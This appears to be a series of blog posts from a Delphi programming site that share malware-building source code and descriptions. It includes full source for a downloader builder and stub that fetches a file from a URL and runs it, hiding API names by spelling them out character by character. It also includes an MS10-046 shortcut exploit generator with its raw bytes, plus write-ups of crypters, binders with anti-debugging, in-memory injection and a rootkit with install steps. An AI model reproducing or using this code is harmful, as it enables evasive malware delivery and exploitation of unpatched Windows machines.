posted 19 Jul 2011 15:20 by Delphi Basics
[
updated 28 Jul 2011 11:39
]
This interesting delphi source code details a unique dropper binder written by Voik.
Version 0.1 -Func-in method -Many anti debugging tricks
-Stub generated in run-time
-Pure ASM stub
-Very nice GUI
Not working:
-Icons
Version 0.2 + Added icon support + Added execute in browser memory + GUI improved + Some bugs, and codes are optimized
Author: Voik Compiled: Delphi 2007 Operating System: Windows Vista
Only Delphi source code is included in the archive. |
posted 24 Dec 2010 08:22 by Delphi Basics
This delphi source code example details the wininet downloader: edited to use func-in technology where the procedure of downloading and executing a file is stored within the resource section of the stub application from where it is called when a built stub is executed.
Builder: program Builder;
//delphibasics.info & ic0de.org
//Authors: cswi, abhe & steve10120
const
kernel32 = 'kernel32.dll';
type
PByte = ^Byte;
function BeginUpdateResourceW(pFileName: PWideChar; bDeleteExistingResources: Boolean): Cardinal; stdcall; external kernel32 name 'BeginUpdateResourceW';
function UpdateResourceW(hUpdate: Cardinal; lpType, lpName: PWideChar; wLanguage: Word; lpData: Pointer; cbData: LongWord): Boolean; stdcall; external kernel32 name 'UpdateResourceW';
function EndUpdateResourceW(hUpdate: Cardinal; fDiscard: Boolean): Boolean; stdcall; external kernel32 name 'EndUpdateResourceW';
const
cFuncIn : PWideChar = 'FUNCIN';
type
TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
TFuncInRecord = Record
xGetProcAddress : TGetProcAddress;
xLoadLibraryA : TLoadLibraryA;
end;
PFuncInRecord = ^TFuncInRecord;
procedure FuncIn(AFuncInRecord : PFuncInRecord; cUrl, cFile : pAnsiChar);
type
PSecurityAttributes = ^TSecurityAttributes;
TSecurityAttributes = record
nLength: LongWord;
lpSecurityDescriptor: Pointer;
bInheritHandle: Boolean;
end;
POverlapped = ^TOverlapped;
TOverlapped = record
Internal: LongWord;
InternalHigh: LongWord;
Offset: LongWord;
OffsetHigh: LongWord;
hEvent: LongWord;
end;
TCreateFileA = function(lpFileName: PAnsiChar; dwDesiredAccess, dwShareMode: LongWord; lpSecurityAttributes: PSecurityAttributes; dwCreationDisposition, dwFlagsAndAttributes: LongWord; hTemplateFile: LongWord): LongWord; stdcall;
TWriteFile = function(hFile: LongWord; const Buffer; nNumberOfBytesToWrite: LongWord; var lpNumberOfBytesWritten: LongWord; lpOverlapped: POverlapped): Boolean; stdcall;
TCloseHandle = function(hObject: LongWord): Boolean; stdcall;
TInternetOpenA = function(lpszAgent: PAnsiChar; dwAccessType: LongWord; lpszProxy, lpszProxyBypass: PAnsiChar; dwFlags: LongWord): Pointer; stdcall;
TInternetOpenUrlA = function(hInet: Pointer; lpszUrl: PAnsiChar; lpszHeaders: PAnsiChar; dwHeadersLength: LongWord; dwFlags: LongWord; dwContext: LongWord): Pointer; stdcall;
TInternetReadFile = function(hFile: Pointer; lpBuffer: Pointer; dwNumberOfBytesToRead: LongWord; var lpdwNumberOfBytesRead: LongWord): Boolean; stdcall;
TInternetCloseHandle = function(hInet: Pointer): Boolean; stdcall;
TShellExecuteA = function(hWnd: LongWord; Operation, FileName, Parameters, Directory: PAnsiChar; ShowCmd: Integer): LongWord; stdcall;
var
szKernel32 : array [0..8] of AnsiChar;
szWininet : array [0..7] of AnsiChar;
szShell32 : array [0..7] of AnsiChar;
szCreateFileA : array [0..11] of AnsiChar;
szWriteFile : array [0..9] of AnsiChar;
szCloseHandle : array [0..11] of AnsiChar;
szInternetOpenA : array [0..13] of AnsiChar;
szInternetOpenUrlA : array [0..16] of AnsiChar;
szInternetReadFile : array [0..16] of AnsiChar;
szInternetCloseHandle : array [0..19] of AnsiChar;
szShellExecuteA : array [0..13] of AnsiChar;
szopen : array [0..4] of AnsiChar;
xCreateFileA : TCreateFileA;
xWriteFile : TWriteFile;
xCloseHandle : TCloseHandle;
xInternetOpenA : TInternetOpenA;
xInternetOpenUrlA : TInternetOpenUrlA;
xInternetReadFile : TInternetReadFile;
xInternetCloseHandle : TInternetCloseHandle;
xShellExecuteA : TShellExecuteA;
hKernel32, hWininet, hShell32 : LongWord;
hSession, hURL: Pointer;
Buffer: Array [1..1024] of Byte;
BufferLen, FileHandle, BytesWritten: LongWord;
begin
szKernel32[0] := 'K'; szKernel32[1] := 'e'; szKernel32[2] := 'r'; szKernel32[3] := 'n'; szKernel32[4] := 'e'; szKernel32[5] := 'l'; szKernel32[6] := '3'; szKernel32[7] := '2'; szKernel32[8] := #0;
szWininet[0] := 'W'; szWininet[1] := 'i'; szWininet[2] := 'n'; szWininet[3] := 'i'; szWininet[4] := 'n'; szWininet[5] := 'e'; szWininet[6] := 't'; szWininet[7] := #0;
szShell32[0] := 'S'; szShell32[1] := 'h'; szShell32[2] := 'e'; szShell32[3] := 'l'; szShell32[4] := 'l'; szShell32[5] := '3'; szShell32[6] := '2'; szShell32[7] := #0;
szCreateFileA[0] := 'C'; szCreateFileA[1] := 'r'; szCreateFileA[2] := 'e'; szCreateFileA[3] := 'a'; szCreateFileA[4] := 't'; szCreateFileA[5] := 'e'; szCreateFileA[6] := 'F'; szCreateFileA[7] := 'i'; szCreateFileA[8] := 'l'; szCreateFileA[9] := 'e'; szCreateFileA[10] := 'A'; szCreateFileA[11] := #0;
szWriteFile[0] := 'W'; szWriteFile[1] := 'r'; szWriteFile[2] := 'i'; szWriteFile[3] := 't'; szWriteFile[4] := 'e'; szWriteFile[5] := 'F'; szWriteFile[6] := 'i'; szWriteFile[7] := 'l'; szWriteFile[8] := 'e'; szWriteFile[9] := #0;
szCloseHandle[0] := 'C'; szCloseHandle[1] := 'l'; szCloseHandle[2] := 'o'; szCloseHandle[3] := 's'; szCloseHandle[4] := 'e'; szCloseHandle[5] := 'H'; szCloseHandle[6] := 'a'; szCloseHandle[7] := 'n'; szCloseHandle[8] := 'd'; szCloseHandle[9] := 'l'; szCloseHandle[10] := 'e'; szCloseHandle[11] := #0;
szInternetOpenA[0] := 'I'; szInternetOpenA[1] := 'n'; szInternetOpenA[2] := 't'; szInternetOpenA[3] := 'e'; szInternetOpenA[4] := 'r'; szInternetOpenA[5] := 'n'; szInternetOpenA[6] := 'e'; szInternetOpenA[7] := 't'; szInternetOpenA[8] := 'O'; szInternetOpenA[9] := 'p'; szInternetOpenA[10] := 'e'; szInternetOpenA[11] := 'n'; szInternetOpenA[12] := 'A'; szInternetOpenA[13] := #0;
szInternetOpenUrlA[0] := 'I'; szInternetOpenUrlA[1] := 'n'; szInternetOpenUrlA[2] := 't'; szInternetOpenUrlA[3] := 'e'; szInternetOpenUrlA[4] := 'r'; szInternetOpenUrlA[5] := 'n'; szInternetOpenUrlA[6] := 'e'; szInternetOpenUrlA[7] := 't'; szInternetOpenUrlA[8] := 'O'; szInternetOpenUrlA[9] := 'p'; szInternetOpenUrlA[10] := 'e'; szInternetOpenUrlA[11] := 'n'; szInternetOpenUrlA[12] := 'U'; szInternetOpenUrlA[13] := 'r'; szInternetOpenUrlA[14] := 'l'; szInternetOpenUrlA[15] := 'A'; szInternetOpenUrlA[16] := #0;
szInternetReadFile[0] := 'I'; szInternetReadFile[1] := 'n'; szInternetReadFile[2] := 't'; szInternetReadFile[3] := 'e'; szInternetReadFile[4] := 'r'; szInternetReadFile[5] := 'n'; szInternetReadFile[6] := 'e'; szInternetReadFile[7] := 't'; szInternetReadFile[8] := 'R'; szInternetReadFile[9] := 'e'; szInternetReadFile[10] := 'a'; szInternetReadFile[11] := 'd'; szInternetReadFile[12] := 'F'; szInternetReadFile[13] := 'i'; szInternetReadFile[14] := 'l'; szInternetReadFile[15] := 'e'; szInternetReadFile[16] := #0;
szInternetCloseHandle[0] := 'I'; szInternetCloseHandle[1] := 'n'; szInternetCloseHandle[2] := 't'; szInternetCloseHandle[3] := 'e'; szInternetCloseHandle[4] := 'r'; szInternetCloseHandle[5] := 'n'; szInternetCloseHandle[6] := 'e'; szInternetCloseHandle[7] := 't'; szInternetCloseHandle[8] := 'C'; szInternetCloseHandle[9] := 'l'; szInternetCloseHandle[10] := 'o'; szInternetCloseHandle[11] := 's'; szInternetCloseHandle[12] := 'e'; szInternetCloseHandle[13] := 'H'; szInternetCloseHandle[14] := 'a'; szInternetCloseHandle[15] := 'n'; szInternetCloseHandle[16] := 'd'; szInternetCloseHandle[17] := 'l'; szInternetCloseHandle[18] := 'e'; szInternetCloseHandle[19] := #0;
szShellExecuteA[0] := 'S'; szShellExecuteA[1] := 'h'; szShellExecuteA[2] := 'e'; szShellExecuteA[3] := 'l'; szShellExecuteA[4] := 'l'; szShellExecuteA[5] := 'E'; szShellExecuteA[6] := 'x'; szShellExecuteA[7] := 'e'; szShellExecuteA[8] := 'c'; szShellExecuteA[9] := 'u'; szShellExecuteA[10] := 't'; szShellExecuteA[11] := 'e'; szShellExecuteA[12] := 'A'; szShellExecuteA[13] := #0;
szopen[0] := 'o'; szopen[1] := 'p'; szopen[2] := 'e'; szopen[3] := 'n'; szopen[4] := #0;
with AFuncInRecord^ do
begin
hKernel32 := xLoadLibraryA(szKernel32);
@xCreateFileA := xGetProcAddress(hKernel32, szCreateFileA);
@xWriteFile := xGetProcAddress(hKernel32, szWriteFile);
@xCloseHandle := xGetProcAddress(hKernel32, szCloseHandle);
hWininet := xLoadLibraryA(szWininet);
@xInternetOpenA := xGetProcAddress(hWininet, szInternetOpenA);
@xInternetOpenUrlA := xGetProcAddress(hWininet, szInternetOpenUrlA);
@xInternetReadFile := xGetProcAddress(hWininet, szInternetReadFile);
@xInternetCloseHandle := xGetProcAddress(hWininet, szInternetCloseHandle);
hShell32 := xLoadLibraryA(szShell32);
@xShellExecuteA := xGetProcAddress(hShell32, szShellExecuteA);
hSession := xInternetOpenA(nil, 0, nil, nil, 0);
hURL := xInternetOpenURLA(hSession, cURL, nil, 0, 0, 0);
FileHandle := xCreateFileA(cFile, $40000000, $00000002, nil, 2, $00000002, 0);
BytesWritten := 0;
repeat
xInternetReadFile(hURL, @Buffer, SizeOf(Buffer), BufferLen);
xWriteFile(FileHandle, Buffer, BufferLen, BytesWritten, nil);
until BufferLen = 0;
xCloseHandle(FileHandle);
xInternetCloseHandle(hURL);
xInternetCloseHandle(hSession);
xShellExecuteA(0, szopen, cFile, nil, nil, 1);
end;
end;
Function WriteResData(pFile: pointer; Size: integer; pwName: pWideChar):Boolean;
const
pwServerFile : PWideChar = 'Stub.exe' ;
var
hResourceHandle: Cardinal;
begin
hResourceHandle := BeginUpdateResourceW(pwServerFile, False);
Result := UpdateResourceW(hResourceHandle, PWideChar(10), pwName, 0, pFile, Size);
EndUpdateResourceW(hResourceHandle, False);
end;
function SizeOfProc(pAddr: pointer): Cardinal;
var dwSize: Cardinal;
begin
dwSize := 0;
repeat
inc(dwSize);
until PByte(Cardinal(pAddr)+dwSize-1)^ = $C3;
Result := dwSize;
end;
begin
WriteResData(@FuncIn, SizeOfProc(@FuncIn), cFuncIn);
WriteResData(nil, 0, 'PACKAGEINFO');
WriteResData(nil, 0, 'DVCLAL');
end.
Stub: program Stub;
const
cURL : PAnsiChar = 'http://www.google.co.za/intl/en_com/images/srpr/logo1w.png';
cFile : PAnsiChar = 'C:\GoogleLogo.png';
const
kernel32 = 'kernel32.dll';
MEM_COMMIT = $1000;
PAGE_EXECUTE_READWRITE = $40;
MEM_RELEASE = $8000;
function GetProcAddress(hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall; external kernel32 name 'GetProcAddress';
function LoadLibraryA(lpLibFileName: PAnsiChar): Cardinal; stdcall; external kernel32 name 'LoadLibraryA';
function FindResourceW(hModule: Cardinal; lpName, lpType: PWideChar): Cardinal; stdcall; external kernel32 name 'FindResourceW';
function LoadResource(hModule: Cardinal; hResInfo: Cardinal): Cardinal; stdcall; external kernel32 name 'LoadResource';
function SizeofResource(hModule: Cardinal; hResInfo: Cardinal): LongWord; stdcall; external kernel32 name 'SizeofResource';
function VirtualAlloc(lpvAddress: Pointer; dwSize, flAllocationType, flProtect: LongWord): Pointer; stdcall; external kernel32 name 'VirtualAlloc';
function VirtualFree(lpAddress: Pointer; dwSize, dwFreeType: LongWord): Boolean; stdcall; external kernel32 name 'VirtualFree';
const
cFuncIn : PWideChar = 'FUNCIN';
type
TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
TFuncInRecord = Record
xGetProcAddress : TGetProcAddress;
xLoadLibraryA : TLoadLibraryA;
end;
PFuncInRecord = ^TFuncInRecord;
PFuncIn = ^TFuncIn;
TFuncIn = procedure(pData : PFuncInRecord; lpTitle, lpMessage : pAnsiChar);
procedure ResGet(ResName: pwidechar; var data : pointer; var Size:LongWord);
var
ResSrc: Cardinal;
ResGlobal: Cardinal;
begin
ResSrc := FindResourceW(0, ResName, PWideChar(10));
ResGlobal := LoadResource(0, ResSrc);
Data := Pointer(ResGlobal);
Size := SizeofResource(0, ResSrc);
end;
procedure CopyMemory(Destination, Source:Pointer; dwSize:LongWord);
asm
PUSH ECX
PUSH ESI
PUSH EDI
MOV EDI, Destination
MOV ESI, Source
MOV ECX, dwSize
REP MOVSB
POP EDI
POP ESI
POP ECX
end;
var
FuncIn : TFuncIn;
pResource : Pointer;
dwResourceSize : LongWord;
AFuncInRecord : TFuncInRecord;
begin
AFuncInRecord.xGetProcAddress := @GetProcAddress;
AFuncInRecord.xLoadLibraryA := @LoadLibraryA;
ResGet(cFuncIn, pResource, dwResourceSize);
FuncIn := VirtualAlloc(nil, dwResourceSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
CopyMemory(@FuncIn, pResource, dwResourceSize);
FuncIn(@AFuncInRecord,cUrl, cFile);
VirtualFree(@FuncIn, 0, MEM_RELEASE);
end.
|
posted 22 Dec 2010 11:18 by Delphi Basics
[
updated 23 Dec 2010 14:39
]
The closed source "Func-In" technique was was pioneered by p0ke (in Nidhogg Crypter) and shapeless (in Poison Ivy). This recreated, open source Delphi example details how to write functions to the resource section of your stub and then call that function from resources upon execution. This enables the user to keep the size of the final application down by only writing selected functions to the stub.
Authors: Counterstrikewi, Abhe & Steve10120 Websites: delphibasics.info & ic0de.org Compiled: Delphi 2007, Delphi XE
Slayer616 created his own func-in technology using shellcode:
Builder: program Builder; //delphibasics.info & ic0de.org //Authors: cswi, abhe & steve10120
const kernel32 = 'kernel32.dll'; MB_YESNO = 4; MB_OK = 0;
type PByte = ^Byte;
function BeginUpdateResourceW(pFileName: PWideChar; bDeleteExistingResources: Boolean): Cardinal; stdcall; external kernel32 name 'BeginUpdateResourceW'; function UpdateResourceW(hUpdate: Cardinal; lpType, lpName: PWideChar; wLanguage: Word; lpData: Pointer; cbData: LongWord): Boolean; stdcall; external kernel32 name 'UpdateResourceW'; function EndUpdateResourceW(hUpdate: Cardinal; fDiscard: Boolean): Boolean; stdcall; external kernel32 name 'EndUpdateResourceW';
const cFuncIn : PWideChar = 'FUNCIN';
type TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall; TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall; TFuncInRecord = Record xGetProcAddress : TGetProcAddress; xLoadLibraryA : TLoadLibraryA; end; PFuncInRecord = ^TFuncInRecord;
procedure FuncIn(AFuncInRecord : PFuncInRecord; lpText, lpCaption : pAnsiChar); type TMessageBoxA = function (hWnd: Cardinal; lpText, lpCaption: PAnsiChar; uType: LongWord): LongWord; stdcall; var szUser32 : array[0..6] of AnsiChar; szMessageBoxA : array[0..11] of AnsiChar; xMessageBoxA : TMessageBoxA; dwResult : LongWord; begin szUser32[0] := 'U'; szUser32[1] := 's'; szUser32[2] := 'e'; szUser32[3] := 'r'; szUser32[4] := '3'; szUser32[5] := '2'; szUser32[6] := #0; szMessageBoxA[0] := 'M'; szMessageBoxA[1] := 'e'; szMessageBoxA[2] := 's'; szMessageBoxA[3] := 's'; szMessageBoxA[4] := 'a'; szMessageBoxA[5] := 'g'; szMessageBoxA[6] := 'e'; szMessageBoxA[7] := 'B'; szMessageBoxA[8] := 'o'; szMessageBoxA[9] := 'x'; szMessageBoxA[10] := 'A'; szMessageBoxA[11] := #0; with AFuncInRecord^ do begin @xMessageBoxA := xGetProcAddress(xLoadLibraryA(szUser32), szMessageBoxA); if Assigned(xMessageBoxA) then begin dwResult := xMessageBoxA(0, lpText, lpCaption, MB_YESNO); if dwResult = 6 then xMessageBoxA(0, lpText, lpCaption, MB_OK); end; end; end;
Function WriteResData(pFile: pointer; Size: integer; pwName: pWideChar):Boolean; const pwServerFile : PWideChar = 'Stub.exe' ; var hResourceHandle: Cardinal; begin hResourceHandle := BeginUpdateResourceW(pwServerFile, False); Result := UpdateResourceW(hResourceHandle, PWideChar(10), pwName, 0, pFile, Size); EndUpdateResourceW(hResourceHandle, False); end;
function SizeOfProc(pAddr: pointer): Cardinal; var dwSize: Cardinal; begin dwSize := 0; repeat inc(dwSize); until PByte(Cardinal(pAddr)+dwSize-1)^ = $C3; Result := dwSize; end;
begin WriteResData(@FuncIn, SizeOfProc(@FuncIn), cFuncIn); WriteResData(nil, 0, 'PACKAGEINFO'); WriteResData(nil, 0, 'DVCLAL'); end.
Stub: program Stub;
const kernel32 = 'kernel32.dll'; MEM_COMMIT = $1000; PAGE_EXECUTE_READWRITE = $40; MEM_RELEASE = $8000;
function GetProcAddress(hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall; external kernel32 name 'GetProcAddress'; function LoadLibraryA(lpLibFileName: PAnsiChar): Cardinal; stdcall; external kernel32 name 'LoadLibraryA'; function FindResourceW(hModule: Cardinal; lpName, lpType: PWideChar): Cardinal; stdcall; external kernel32 name 'FindResourceW'; function LoadResource(hModule: Cardinal; hResInfo: Cardinal): Cardinal; stdcall; external kernel32 name 'LoadResource'; function SizeofResource(hModule: Cardinal; hResInfo: Cardinal): LongWord; stdcall; external kernel32 name 'SizeofResource'; function VirtualAlloc(lpvAddress: Pointer; dwSize, flAllocationType, flProtect: LongWord): Pointer; stdcall; external kernel32 name 'VirtualAlloc'; function VirtualFree(lpAddress: Pointer; dwSize, dwFreeType: LongWord): Boolean; stdcall; external kernel32 name 'VirtualFree';
const cFuncIn : PWideChar = 'FUNCIN';
type TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall; TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall; TFuncInRecord = Record xGetProcAddress : TGetProcAddress; xLoadLibraryA : TLoadLibraryA; end; PFuncInRecord = ^TFuncInRecord;
PFuncIn = ^TFuncIn; TFuncIn = procedure(pData : PFuncInRecord; lpTitle, lpMessage : pAnsiChar);
procedure ResGet(ResName: pwidechar; var data : pointer; var Size:LongWord); var ResSrc: Cardinal; ResGlobal: Cardinal; begin ResSrc := FindResourceW(0, ResName, PWideChar(10)); ResGlobal := LoadResource(0, ResSrc); Data := Pointer(ResGlobal); Size := SizeofResource(0, ResSrc); end;
procedure CopyMemory(Destination, Source:Pointer; dwSize:LongWord); asm PUSH ECX PUSH ESI PUSH EDI MOV EDI, Destination MOV ESI, Source MOV ECX, dwSize REP MOVSB POP EDI POP ESI POP ECX end;
var FuncIn : TFuncIn; pResource : Pointer; dwResourceSize : LongWord; AFuncInRecord : TFuncInRecord; begin AFuncInRecord.xGetProcAddress := @GetProcAddress; AFuncInRecord.xLoadLibraryA := @LoadLibraryA; ResGet(cFuncIn, pResource, dwResourceSize); FuncIn := VirtualAlloc(nil, dwResourceSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); CopyMemory(@FuncIn, pResource, dwResourceSize); FuncIn(@AFuncInRecord,'cswi <3 abhe & steve10120', '<3 p0ke'); VirtualFree(@FuncIn, 0, MEM_RELEASE); end.
|
posted 9 Dec 2010 15:16 by Delphi Basics
This code details the MS10-046 'CPL Lnk Exploit' in Delphi.
Cpl Lnk Vulnerability - MS10-046 in Delphi Author: - Paray_Vx - Tested and Working on Windows Xp, Windows Vista and Windows 7
program MS10046; uses SysUtils, Windows;
procedure CplLnkExploit(location:string); const // ShellCode Lnk Vulnerability Sizelnk :integer = 141; ShellCode : ARRAY [1..141] OF Byte = ( $4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,$46,$81,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$01, $00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$36,$01,$14,$00,$1F,$50,$E0,$4F,$D0,$20,$EA,$3A,$69,$10,$A2,$D8,$08,$00,$2B,$30,$30,$9D,$14,$00,$2E,$1E,$20,$20,$EC,$21,$EA,$3A,$69,$10,$A2,$DD,$08,$00,$2B,$30,$30,$9D,$0C,$01,$00,$00,$00, $00,$00,$00,$00,$00,$00,$00,$00,$6A,$00,$00,$00,$00,$00,$00,$20,$00,$3A);
// ~ Your Dll Here ~ Ex : 'C:\MS10046.dll' SizeNameDll : integer = 28; Dllx : ARRAY [1..28] OF Byte = ($00,$43,$00,$3A,$00,$5C,$00,$4D,$00,$53,$00,$31,$00,$30,$00,$30,$00,$34,$00,$36,$00,$2E,$00,$64,$00,$6C,$00,$6C);
var one : file; i : integer;
begin AssignFile(one,location); Rewrite(one,1);
for i:=1 to Sizelnk do begin BlockWrite(one,ShellCode[i],1); end;
for i:=1 to SizeNameDll do begin BlockWrite(one,Dllx[i],1); end;
CloseFile(one); end;
begin MessageBoxA(0,'CPL Lnk Exploit Built!', 'MS10-046', MB_OK); // Extract here CplLnkExploit('C:\MS10-046.lnk'); end.
Library MS10046;
uses
Windows;
begin
MessageBoxA(0, 'CPL Lnk Exploit Success!', 'MS10-046', MB_ICONWARNING);
end.
Many PCs are unpatched and vulnerable to this exploit. To protect yourself, patch your OS here:
Read more about CPL Lnk Vulnerability (MS10-04) here : |
posted 29 Sep 2010 14:35 by Delphi Basics
[
updated 1 Mar 2011 12:05
]
Open Source Code Crypter 1.0 by p0ke I wrote this opensource crypter for delphi coders. Its nothing advanced, but i probably will add functions to it with time. Features: 10 file limit Memory Execution support EOF-Settings support Custom Stub support Drop to Harddrive support
Joining Method: Resources Encryption: Custom XOR Memory Execution: uMemoryExecute by p0ke. This unit is compatible with Windows XP & Vista but not compatible with Windows 7.
Only Delphi source code is included in the archive. |
posted 18 Sep 2010 15:07 by Delphi Basics
AFX Rootkit 2005 by Aphex
This program patches Windows API to hide certain objects from being listed.
WARNING -> FOR WINDOWS NT/2000/XP/2003 ONLY!
Current Version Hides: a) Processes b) Handles c) Modules d) Files & Folders e) Registry Keys & Values f) Services g) TCP/UDP Sockets h) Systray Icons
Configuring a computer with the rootkit is simple...
1. Create a new folder with a uniqiue name i.e. "c:\winnt\rewt\" 2. In this folder place the root.exe i.e. "c:\winnt\rewt\root.exe" 3. Execute root.exe with the "/i" parameter i.e. "start c:\winnt\rewt\root.exe /i" 4. Inside this folder place any other programs or files.
Everything inside the root folder is now invisible! If you place other services or programs in the root folder they will be invisible from process/file/dll/handle/socket/etc listing. However, all programs in the root folder can see each other.
Registry value names are hidden differently from everything else. The name must begin with the root folder name followed by "\" and other characters i.e. "rewt\hiddenstartup1".
Registry key names are hidden if they have the same name as the root folder i.e. "rewt".
Also, the root folder is unique throughout the system. This means "c:\rewt\", "c:\winnt\rewt\" and "c:\winnt\system32\rewt\" all will be hidden because they all share the root folder name "rewt".
Removal: If you install it make sure you know how to remove it!
Method 1 1. Run the root.exe with the "/u" parameter 2. Delete all the files associated with it 3. Reboot
Method 2 1. Boot into safe mode 2. Locate the service with the root folder name 3. Remove the service and delete all the files associated with it 4. Reboot
How To Properly Compile AFX Rootkit
Inside hook.dpr there is a variable...
var
szDllPath: pchar = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
After compiling hook.dll you must open it with a hex editor and find the offset of that string of X's.
Once you find the offset you need to open root.dpr. Search for the hex number $4a54 and replace it with the new offset.
Each version of Delphi will have a different offset. The offset $4a54 is for Delphi 6. So you shouldn't need to change it if you use D6. It is always best to double check though.
Only Delphi source code is included in the archive. |
posted 14 Sep 2010 16:07 by Danny Rancher
This crypter is the latest rewrite of the self-injection code, by shapeless and steve10120.
Original self-injecting crypter by shapeless:
Original self-injecting unit by steve10120:
The additional builder code in this release is necessary for two reasons: - To change the imagebase of the stub file to that of the target file.
- To enlarge the last section so its big enough to cover the SizeOfImage of the target file.
Author: steve10120 Compiled: Delphi 2007
Tested and working environments: Windows XP, Vista, 7.
Only Delphi source code is included in the archive. |
posted 24 Aug 2010 15:47 by Delphi Basics
[
updated 15 Oct 2010 15:35
]
PI crypter, coded by Counterstrikewi, is compatible with all executable files.
Joining Method: Resources Encryption: RC4 Special Features: Most apis are dynamically called; Inject PE to Browser.
YouTube Player - High Quality VideoThank you
steve10120
p0ke
SWiM
Xash
ap0calypse
Rogue
shapeless
testest
abhe
Friends
DarkCoderSC
Slayer616
who!
mjrod5
~Fleck
Cracksman
FusioN
Menace
Neo
f0rce
Only Delphi source code is included in the archive |
posted 17 Aug 2010 17:23 by Delphi Basics
Delphi Example Binder by ErazerZ Date: 3rd May 2006
Binding.exe - Main Program, the binder External Stub.exe - Example of a packed stub, its 3,75 KB and it works :O
ErazerZ
Only Delphi source code is included in the archive. |
posted 29 Jun 2010 12:53 by Delphi Basics
This crypter uses a new memory injection technique, pioneered by shapeless where the current process is unmapped to be replaced with the map of a custom PE.
|
|
